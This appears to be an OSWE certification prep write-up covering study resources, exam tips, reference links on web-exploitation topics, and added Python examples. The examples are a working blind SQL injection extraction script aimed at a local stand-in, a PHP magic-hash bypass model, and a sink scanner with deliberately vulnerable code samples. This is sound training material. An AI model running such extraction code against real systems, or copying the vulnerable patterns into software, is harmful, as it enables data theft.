Meow meow meow
Preparation
The main preparation was the course material and the lab, plus the extra sets of exercises in the lab.
PentesterLab's Code Review badge
https://pentesterlab.com/badges/codereview
and completing every exercise in the official PortSwigger Web Security Academy
Dashboard | Web Security Academy - PortSwigger
https://portswigger.net/web-security/dashboard
I also had a general look at the ones in the reference resources below.
Exam
It went as shown in the time log.
The exam provides 5 machines: 2 exam target machines, 2 corresponding debugging machines, and 1 Kali box.
Because of network problems, remote debugging in VS Code over a GUI remote connection to the debugging machine was extremely laggy, so I didn't debug at all; I just connected over SSH to read the code and test.
Read the code end to end and understand the complete logic. The vulnerability points are all ones encountered in the lab (including the extra exercises); the main work is spotting them, chaining the different points together, and completing the full exploitation flow.
Once manual exploitation succeeds, the Burp plugins can be used directly to help write the exp; the exp can be tested on the provided Kali box, where the connection to the targets is fast.
That's about it.
Time log
Roughly like this:
1 | the 3rd |
Burp plugins
Generate the corresponding request code straight from Burp; it makes writing the exp convenient. I mainly use Python, but for cases where it has to be done in Java, Copy2Java works too (it requires installing a third-party library).
- Copy As Python-Requests - PortSwigger
  https://portswigger.net/bappstore/b324647b6efa4b6a8f346389730df160
- TheKingOfDuck/Copy2Java: one-click Java code generation plugin for Burp / Generate Java script for fuzzing in Burp.
  https://github.com/TheKingOfDuck/Copy2Java
- kevinsawicki/http-request: Java HTTP Request Library
  https://github.com/kevinsawicki/http-request
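As an added example (not code from this post or from the plugins above), here is the shape such an exp takes once the request that Copy As Python-Requests generates is wrapped in an extraction loop: a boolean-based blind SQL injection that pulls a column out one character at a time with a binary search. The target is a constructed in-process SQLite stand-in so the script runs offline; the table, column names and SECRET are made up for the demo, and `oracle()` is the one place where the real `requests` call would go.

```python
import sqlite3
from typing import Callable

# --- Constructed stand-in for the exam target (in-memory SQLite) -------------
# The real exp would send HTTP requests; here the "server" is a function so the
# whole thing runs offline. SECRET is a made-up value, not from any real target.
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"

_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
_db.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", SECRET))
_db.commit()


def vulnerable_login(username: str) -> bool:
    """Deliberately vulnerable: user input is formatted straight into the SQL.
    The only signal the attacker sees is 'logged in' (True) or not (False);
    database errors are swallowed, so error-based extraction is not available."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


# --- Exploit side ------------------------------------------------------------
requests_sent = 0


def oracle(condition: str) -> bool:
    """Boolean oracle. In a real exp this is the requests.post() call that
    'Copy As Python-Requests' generates, with `condition` spliced into the
    injected parameter and the response body checked for the success marker."""
    global requests_sent
    requests_sent += 1
    return vulnerable_login(f"admin' AND ({condition}) -- ")


def _bsearch(cond_for: Callable[[int], str], lo: int, hi: int) -> int:
    """Binary search for the true value v in [lo, hi]. cond_for(mid) must
    build a condition meaning 'true value > mid'. A value outside the range
    is silently clamped, so pick the range to cover the expected charset."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(cond_for(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_value(column: str, table: str, where: str, max_len: int = 256) -> str:
    """Extract `column` from the row matching `where`, one character at a time.
    Each character costs at most 7 requests (binary search over printable ASCII
    32..126) instead of up to 95 with a linear scan; the length costs at most 9."""
    length = _bsearch(
        lambda m: f"(SELECT length({column}) FROM {table} WHERE {where}) > {m}",
        0, max_len,
    )
    chars = []
    for pos in range(1, length + 1):
        # substr()/unicode() are SQLite; on MySQL/PostgreSQL use SUBSTRING()/ASCII().
        cond = (lambda m, p=pos:
                f"(SELECT unicode(substr({column}, {p}, 1)) FROM {table} WHERE {where}) > {m}")
        chars.append(chr(_bsearch(cond, 32, 126)))
    return "".join(chars)


if __name__ == "__main__":
    print(extract_value("password", "users", "username = 'admin'"))
    print(f"{requests_sent} requests")
```

Swapping the stand-in for the real target means replacing the body of `oracle()` with the generated request and a check on the response; the extraction logic above does not change. Keep the request counter: it is the first thing to look at when the exp is slow, and it tells you whether a per-character linear scan is worth replacing with the binary search.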
Reference resources
All learning materials | Web Security Academy
PentesterLab: Learn Web App Pentesting!
OSWE prep in HTB
TROUBLE-1/White-box-pentesting: This lab is created to demonstrate pass-the-hash, blind sql and SSTI vulnerabilities
softwaresecured/secure-code-review-checklist: A starter secure code review checklist
https://github.com/softwaresecured/secure-code-review-checklist
Bug Patterns - Find Security Bugs
timip/OSWE: OSWE Preparation
wetw0rk/AWAE-PREP: This repository will serve as the “master” repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.
Home · rinku191/OSWE-prepration Wiki
w181496/Web-CTF-Cheatsheet: Web CTF CheatSheet 🐈
SQL injection
PentesterLab: Learn Web App Pentesting!
https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition/course
Blind SQL Injection | OWASP
POSTGRESQL CODE EXECUTION: UDF REVISITED | by AFINE | Medium
https://afinepl.medium.com/postgresql-code-execution-udf-revisited-3b08412f47c1
SQL Injection Double Uppercut :: How to Achieve Remote Code Execution Against PostgreSQL
SQL Injection and Postgres - An adventure to eventual RCE
Exploiting PostgreSQL Restore - Blog
https://jon-stewart.github.io/exploiting-postgresql-restore/
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium
Taking SQL Injections further (Blind Second Order SQL Injection + TMHC CTF Shitter Writeup) - Web Hacking - 0x00sec - The Home of the Hacker
Lord of SQLInjection
21y4d/blindSQLi: A python based blind SQL injection exploitation script
SSTI
DiogoMRSilva/websitesVulnerableToSSTI: Simple websites vulnerable to Server Side Template Injections(SSTI)
epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
XSS
XSS Showcase
XSS Challenges (by yamagata21) - Stage #1
Client XSS Exercises - DomGoat
Javascript for Pentesters
Deserialization
Deserialization - OWASP Cheat Sheet Series
https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
OWASP TOP 10: Insecure Deserialization - Detectify Blog
https://blog.detectify.com/2018/03/21/owasp-top-10-insecure-deserialization/
OWASP Top 10 in 2017: Insecure Deserialization Security Vulnerability Practical Overview | ImmuniWeb Security Blog
https://www.immuniweb.com/blog/OWASP-insecure-deserialization.html
Java
ManageEngine Applications Manager Deserialization Unauthenticated RCE · Application Security Blog
Java Deserialization — From Discovery to Reverse Shell on Limited Environments | by Francesco Soncina (phra) | ABN AMRO — Red Team | Medium
Understanding & practicing java deserialization exploits – DiabloHorn
https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/
Understanding Java deserialization – Nytro Security
https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
GrrrDog/Java-Deserialization-Cheat-Sheet: The cheat sheet about Java Deserialization vulnerabilities
.NET
Ivan1ee/NET-Deserialize: a collection of ten .NET deserialization articles, continuously updated
DotNetNuke arbitrary code execution vulnerability (CVE-2017-9822) analysis and advisory
How to exploit the DotNetNuke Cookie Deserialization - Pentest-Tools.com Blog
https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization/
ObjectDataProvider Class (System.Windows.Data) | Microsoft Docs
Details of XML serialization | Microsoft Docs
https://docs.microsoft.com/en-us/dotnet/standard/serialization/introducing-xml-serialization
New .NET deserialization gadget for compact payload. When size matters | Micro Focus Community
Exploiting Deserialisation in ASP.NET via ViewState | Soroush Dalili (@irsdl) – سروش دلیلی
https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
Friday the 13th: JSON Attacks - Black Hat USA 2017 slides (PDF)
https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
The Battle of C# to JSON Serializers in .NET Core 3 - Michael’s Coding Spot
https://michaelscodingspot.com/the-battle-of-c-to-json-serializers-in-net-core-3/
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization
Black Hat USA 2012 - Are You My Type? Breaking .net Sandboxes Through Serialization - YouTube
https://www.youtube.com/watch?v=Xfbu-pQ1tIc&ab_channel=BlackHat
pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
Python
Escalating Deserialization Attacks (Python)
https://frichetten.com/blog/escalating-deserialization-attacks-python/
Nodejs
Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
Command injection
Artsploit: [demo.paypal.com] Node.js code injection (RCE)
Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
Nodejs RCE and a simple reverse shell
https://ibreak.software/2016/08/nodejs-rce-and-a-simple-reverse-shell/
Type juggling
PHP Type Juggling. PHP has two comparisons loose (==, =!)… | by HacktheBoxWalkthroughs | Medium
https://medium.com/@Q2hpY2tlblB3bnk/php-type-juggling-c34a10630b10
PHP Type Juggling Vulnerabilities | by Vickie Li | The Startup | Medium
https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
PHP: PHP type comparison tables - Manual
PHP Type Juggling Vulnerabilities, Netsparker - Paul’s Security Weekly #572 - YouTube
https://www.youtube.com/watch?v=ASYuK01H3Po&ab_channel=SecurityWeekly
PHPMagicTricks-TypeJuggling.pdf
https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
Type Juggling Authentication Bypass Vulnerability in CMS Made Simple | Netsparker
https://www.netsparker.com/blog/web-security/type-juggling-authentication-bypass-cms-made-simple/
Type Juggling and PHP Object Injection, and SQLi, Oh My!
https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
Magic Hashes | NTT Application Security
spaze/hashes: Magic hashes – PHP hash “collisions”
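An added example, not taken from any of the linked articles: a Python model of what PHP's loose `==` does when both operands are numeric strings, which is the mechanism behind the "magic hash" login bypass. The strings `QNKCDZO` and `240610708` are the widely cited magic-hash inputs; their MD5 digests are computed with hashlib rather than assumed. The two `check_password_*` functions are hypothetical and only illustrate the vulnerable and fixed comparison.

```python
import hashlib
import hmac
import re

# PHP's notion of a "numeric string": optional leading whitespace, optional sign,
# digits with an optional fraction, optional exponent. (PHP 8 additionally
# tolerates trailing whitespace, which does not matter for hex digests.)
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def is_numeric_string(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Model of `$a == $b` for two PHP strings (same in PHP 5, 7 and 8):
    if both look numeric they are compared as numbers, otherwise byte-wise.
    "0e123" is the number 0 * 10^123 == 0, so any two such strings are equal."""
    if is_numeric_string(a) and is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """Model of `===` / hash_equals(): same bytes, no conversion. compare_digest
    also makes it constant-time, which is what you want for secrets anyway."""
    return hmac.compare_digest(a.encode(), b.encode())


_MAGIC = re.compile(r"^0+e\d+$")


def is_magic_hash(hexdigest: str) -> bool:
    """True if a hex digest is all digits after a leading '0e', i.e. PHP would
    read it as zero and `==` it to every other such digest."""
    return _MAGIC.match(hexdigest) is not None


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def check_password_loose(stored_md5: str, supplied: str) -> bool:
    """Vulnerable (hypothetical) check: md5($input) == $stored."""
    return php_loose_eq(stored_md5, md5_hex(supplied))


def check_password_strict(stored_md5: str, supplied: str) -> bool:
    """Fixed check: hash_equals($stored, md5($input)), i.e. strict bytes."""
    return php_strict_eq(stored_md5, md5_hex(supplied))


if __name__ == "__main__":
    for s in ("QNKCDZO", "240610708"):
        print(s, md5_hex(s), is_magic_hash(md5_hex(s)))
    # A user whose stored hash is magic can log in with any other magic-hash input.
    print(check_password_loose(md5_hex("QNKCDZO"), "240610708"))
    print(check_password_strict(md5_hex("QNKCDZO"), "240610708"))
```

When reviewing PHP code, the thing to grep for is `==` (and `in_array`, `switch`, `array_search` without the strict flag) on anything derived from a hash, token or signature; the fix is `===` or `hash_equals()`, and the model above shows why `==` is not enough even on PHP 8.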
File upload
45074-file-upload-restrictions-bypass.pdf
https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf
hacking website by shell uploading
http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html
Unrestricted File Upload | OWASP
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
File upload bypass - Hacker’s Grimoire
https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass
Online execution environments for various languages
Online PHP Editor | an online execution environment for writing and running code in the browser |
PHP Sandbox, test PHP online, PHP tester
SQL OnLine IDE
regex101: build, test, and debug regex
grep-based vulnerability discovery
Don’t Underestimate Grep Based Code Scanning – Little Man In My Head
https://littlemaninmyhead.wordpress.com/2019/08/04/dont-underestimate-grep-based-code-scanning/
dustyfresh/PHP-vulnerability-audit-cheatsheet: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet
wireghoul/graudit: grep rough audit - source code auditing tool
Bug Patterns - Find Security Bugs
Using Grep + Regex (Regular Expressions) to Search Text in Linux | DigitalOcean
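An added example in the spirit of the PHP-vulnerability-audit-cheatsheet and graudit (not code from either project): a small sink scanner that does what a handful of `grep -rnE` commands do, but keeps the patterns per language and category so hits come back labelled with a line number. The PHP and Node samples it scans are constructed for the demo. Every hit is only a starting point; the code still has to be read backwards from the sink to see whether user input reaches it.

```python
import re
from typing import Dict, List, Tuple

# Sink patterns per language and category. Deliberately loose: false positives
# are cheap to dismiss while reading, missed sinks are not.
SINKS: Dict[str, Dict[str, str]] = {
    "php": {
        "code-exec": r"\b(eval|assert|create_function)\s*\(",
        "cmd-exec": r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(|`[^`]*\$",
        "deserialize": r"\bunserialize\s*\(",
        "file-include": r"\b(include|require)(_once)?\s*\(?\s*\$",
        "sql": r"\b(mysqli?_query|pg_query|->query)\s*\(.*\$",
        "file-upload": r"\bmove_uploaded_file\s*\(",
    },
    "js": {
        "code-exec": r"\beval\s*\(|new\s+Function\s*\(|\bvm\.runIn",
        "cmd-exec": r"\b(exec|execSync|spawn)\s*\(",
        "deserialize": r"\bunserialize\s*\(",
        "sql": r"\.(query|raw)\s*\(\s*[`'\"].*\$\{",
    },
}


def scan_source(source: str, lang: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, category, stripped_line) for every sink hit in `source`.
    One line can produce several hits if it matches several categories."""
    hits = []
    for n, line in enumerate(source.splitlines(), start=1):
        for category, pattern in SINKS[lang].items():
            if re.search(pattern, line):
                hits.append((n, category, line.strip()))
    return hits


# Constructed sample inputs (not from any real application).
SAMPLE_PHP = """\
<?php
$id = $_GET['id'];
$res = mysqli_query($conn, "SELECT * FROM items WHERE id = $id");
$obj = unserialize($_COOKIE['state']);
$out = htmlspecialchars($name);
system("ping -c 1 " . $_POST['host']);
include($_GET['page'] . ".php");
"""

SAMPLE_JS = """\
const { exec } = require('child_process');
app.get('/ping', (req, res) => {
  exec('ping -c 1 ' + req.query.host, (e, out) => res.send(out));
});
const data = serialize.unserialize(req.cookies.profile);
"""


def report(source: str, lang: str, name: str) -> List[str]:
    """grep -n style output lines: name:line:[category] code."""
    return [f"{name}:{n}:[{cat}] {text}" for n, cat, text in scan_source(source, lang)]


if __name__ == "__main__":
    for line in report(SAMPLE_PHP, "php", "app.php") + report(SAMPLE_JS, "js", "server.js"):
        print(line)
```

To run it over a real checkout, replace the two sample strings with the contents of each file (walk the tree with `os.walk`, pick `lang` from the extension). For larger code bases the same patterns go straight into graudit's signature files or a Semgrep rule, but the grep pass is what finds the `unserialize()` on a cookie in the first ten minutes of reading.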
Debugging
Debugging .NET assemblies
.NET Reflector Visual Studio Extension - Visual Studio Marketplace
dnSpy/dnSpy: .NET debugger and assembly editor
Debug .NET Framework source - Visual Studio (Windows) | Microsoft Docs
How to debug your .NET applications and packages without the actual source | Dominique St-Amand
https://www.domstamand.com/debugging-your-dotnet-applications-and-packages-howto/
Language-specific checklists
nodejs
Node.js Security Checklist - RisingStack Engineering
aadityapurani/NodeJS-Red-Team-Cheat-Sheet: NodeJS Red-Team Cheat Sheet
https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet
jesusprubio/awesome-nodejs-pentest: Delightful Node.js packages useful for penetration testing, exploiting, reverse engineer, cryptography …
Secure Code Review and Penetration Testing of Node.js and JavaScript Apps | by Mostafa Moradian | The Startup | Medium
https://github.com/carnal0wnage/exploits-1/blob/master/nodejsshell.py
References
- OSWE Review (exam write-up) - 高林の雑記ブログ
  https://kakyouim.hatenablog.com/entry/2021/04/02/162147
- OSWE Review (AWAE Course) - S7acktrac3
  https://stacktrac3.co/oswe-review-awae-course/
- [CERT] OSWE Exam Review and Tips (ft. No Developer Background Candidate) | by bigb0ss | InfoSec Write-ups
  https://infosecwriteups.com/cert-oswe-exam-review-and-tips-ft-no-developer-background-candidate-1dad7f545155